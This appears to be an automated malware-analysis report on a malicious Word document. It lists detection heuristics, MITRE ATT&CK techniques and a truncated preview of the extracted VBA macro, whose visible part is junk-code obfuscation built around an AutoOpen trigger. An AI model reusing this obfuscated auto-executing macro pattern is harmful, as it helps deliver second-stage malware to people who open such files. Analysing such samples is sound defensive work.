MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a malicious VBA macro. The AutoOpen macro is triggered upon opening, and the CreateObject heuristic indicates it attempts to instantiate and execute objects. This suggests the macro is designed to download and execute a second-stage payload, a common technique for initial compromise via spearphishing attachments.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 68836 bytes |
SHA-256: e568284d567562050a68e3b984d14816ac4fe985f94cb75ec2636ba4c92f5b80 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "yhjrUGkT0"
Public Function RsBDik4(ByRef rIhQ4iPMLM As String, ByVal bM85Flk As String) As String
Dim AVkLV9S9Az() As Byte
If Application.UserName = "NU0jymmayC4" Then
MsgBox ("GSOhfpfv50R")
Else
Dim gT2fzuPvMVYaGs As String
gT2fzuPvMVYaGs = Application.UserName
End If
If Len(Application.UserName) < 168 Then
Dim eBxe7G0h As Collection
End If
If Len(Application.UserName) < 723 Then
Dim vbtXRQIp As Collection
End If
If Len(Application.UserName) < 228 Then
Dim L5qSVQTB As Collection
End If
Dim UJNzHYsk() As Byte
Dim NeWTECN As String
For v1Oz7kPGi = 0 To 6
NeWTECN = NeWTECN + "d"
Next v1Oz7kPGi
For kKenO4ZE = 0 To 9
bDM1ZdG = bDM1ZdG + kKenO4ZE
Next kKenO4ZE
Dim gIcleJoDR1 As Long
For Ubgx6f = 7 To 15
gIcleJoDR1 = gIcleJoDR1 + Ubgx6f
Next Ubgx6f
Dim HGLTiUG9 As String
HGLTiUG9 = Application.UserName
Dim xZ6KxGErVL As Collection
Dim t6LZbvbq As Integer
While Len(HGLTiUG9) > 7
t6LZbvbq = t6LZbvbq + 9
ZNrXOP = Len(HGLTiUG9) - 8
Wend
Dim eEt1UVE As String
eEt1UVE = Application.UserName
Dim B7aOgleId As Collection
Dim q5Kx20 As Integer
While Len(eEt1UVE) > 9
q5Kx20 = q5Kx20 + 8
F6XZzI = Len(eEt1UVE) - 6
Wend
Dim nkm09CMc As Long
Dim jEwsJL41, YNRGtBylA As Integer
jEwsJL41 = 6 + 6
For tnh1DE = 0 To 6
YNRGtBylA = YNRGtBylA + tnh1DE
Next tnh1DE
If YNRGtBylA < tnh1DE Then
Dim upTO83YNXe As Long
End If
Dim OO1XwV As Long
For y3FeF5c16x = 6 To 13
OO1XwV = OO1XwV + y3FeF5c16x
Next y3FeF5c16x
Dim Wx4vAD7 As String
For I2FAoKGYaK = 0 To 6
Wx4vAD7 = Wx4vAD7 + "c"
Next I2FAoKGYaK
Dim c7C61H As String
For xPsVWJWF = 0 To 6
c7C61H = c7C61H + "H"
Next xPsVWJWF
Dim Z13QTeABMm As String
Z13QTeABMm = Application.UserName
Dim Al6Ay6s As Collection
Dim Ovg28jDm As Integer
While Len(Z13QTeABMm) > 7
Ovg28jDm = Ovg28jDm + 7
qM4tOaqJ = Len(Z13QTeABMm) - 8
Wend
Dim pOXVylrY As String
pOXVylrY = Application.UserName
Dim DtvnDhvHl6 As Collection
Dim MVvDgrp As Integer
While Len(pOXVylrY) > 6
MVvDgrp = MVvDgrp + 8
JXi2q4faMW = Len(pOXVylrY) - 8
Wend
If Application.UserName = "kozZy7iUr6d" Then
MsgBox ("c3AoLvsi1vr")
Else
Dim jd3ghWXSaXYeRG As String
jd3ghWXSaXYeRG = Application.UserName
End If
Dim qyoMRliO As Long
Dim cwgMW9C, VL3lJEyVm As Integer
cwgMW9C = 6 + 9
For TRysSt = 0 To 7
VL3lJEyVm = VL3lJEyVm + TRysSt
Next TRysSt
If VL3lJEyVm < TRysSt Then
Dim e2l7Kb6e As Long
End If
Dim GzmWyR7dY As String
For ggeODn = 0 To 7
GzmWyR7dY = GzmWyR7dY + "h"
Next ggeODn
If Len(Application.UserName) < 794 Then
Dim VSlZPiRfoG As Collection
End If
If Application.UserName = "CVEaVFB74Mo" Then
MsgBox ("sx6Hcr0sQJh")
Else
Dim bk7pi2K9BSORNi As String
bk7pi2K9BSORNi = Application.UserName
End If
Dim NlUW6FgLxLH As Long
Dim PuOAjiW0qi, dyg55xw As Integer
PuOAjiW0qi = 7 + 9
For qhXcyJozRW = 0 To 6
dyg55xw = dyg55xw + qhXcyJozRW
Next qhXcyJozRW
If dyg55xw < qhXcyJozRW Then
Dim fDKcGB4 As Long
End If
Dim YRFxlvDYJd As String
For aLfz32 = 0 To 8
YRFxlvDYJd = YRFxlvDYJd + "X"
Next aLfz32
If Len(Application.UserName) < 328 Then
Dim bmVCldi As Collection
End If
Dim aJBbefimde As String
aJBbefimde = Application.UserName
Dim zsoDoUMtVq As Collection
Dim RcvtIg As Integer
While Len(aJBbefimde) > 9
RcvtIg = RcvtIg + 8
WfdRyzLd = Len(aJBbefimde) - 5
Wend
Dim GKNcLb9LcQ0 As Long
Dim CiUk3J As String
For RIab8UtETL = 0 To 9
CiUk3J = CiUk3J + "m"
Next RIab8UtETL
Dim fVRza9rUvF As Long
For GCc7SxQS = 8 To 16
fVRza9rUvF = fVRza9rUvF + GCc7SxQS
Next GCc7SxQS
Dim jbWkwct, wFz4lu As Integer
jbWkwct = 6 + 5
For yewGeI = 0 To 9
wFz4lu = wFz4lu + yewGeI
Next yewGeI
If wFz4lu < yewGeI Then
Dim aOItBxcV7 As Long
End If
Dim xV7bqbp, Ka1usH As Integer
xV7bqbp = 8 + 8
For Q3EQaQ = 0 To 8
Ka1usH = Ka1usH + Q3EQaQ
Next Q3EQaQ
If Ka1usH < Q3EQaQ T
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.